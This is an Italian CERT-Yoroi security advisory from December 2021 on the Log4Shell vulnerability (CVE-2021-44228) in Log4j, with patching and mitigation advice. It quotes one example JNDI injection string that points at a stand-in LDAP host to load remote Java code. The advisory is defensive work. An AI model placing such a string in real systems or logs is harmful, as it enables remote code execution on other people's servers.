Attacchi Log4J in the wild
12/13/2021
Proto: N011221.
Con la presente CERT-Yoroi intende informarla riguardo una nuova ondata di attacchi di portata globale diretta a tutti applicativi JavaEE che utilizzano la libreria di logging Log4J. La vulnerabilità è nota con identificativo CVE-2021-44228 e nota con l’alias “Log4Shell”.
A causa di lacune nella fase di acquisizione e deserializzazione dei log, il flusso di esecuzione del componente JNDI gestito dalla libreria Log4J può essere alterato inserendo nei log applicativi una specifica stringa malevola.
In particolare, un attaccante in grado di controllare una qualsiasi fonte che genera log gestiti da Log4j, può sfruttare la vulnerabilità e generare un log contenente la specifica stringa “${jndi:ldap://example.com/a}” che eseguirà richieste di rete verso i server dell'attaccante, capace di iniettare codici java malevoli in grado di infettare i server di backend che ospitano i servizi di logging Log4j.
Il Manutentore ha confermato la vulnerabilità nel bollettino di sicurezza Log4j, nel quale ha rilasciato la versione 2.15.0 che risolve questa vulnerabilità. La versione aggiornata è già disponibile, inoltre, nei repositori binari maven, pertanto, è opportuno appurare l'uso della versione log4j-core “<version>2.15.0</version>“ all’interno dei file di configurazione “POM.xml”.
La tecnologia Log4J risulta essere di fatto molto utilizzata all’interno di applicazioni java commerciali ed in progetti custom basati su tecnologia JavaEE, e nelle ultime ore sono stati registrati attacchi ransomware ed infezioni cobaltstrike veicolate tramite lo sfruttamento di CVE-2021-44228. Pertanto, CERT Yoroi consiglia caldamente di:
- Censire gli utilizzi delle librerie Log4J in tutti gli applicativi JavaEE
- Applicare patch e workaround suggeriti dal vendor
- Valutare il blocco temporaneo delle connessioni outgoing dei sistemi potenzialmente afflitti
CERT Yoroi precisa, inoltre, che i Clienti dei servizi di monitoraggio gestiti Yoroi hanno copertura di rilevamento dei tentativi di attacco dalla giornata del 10 Dicembre 2021.
Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro “cyber”. Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index
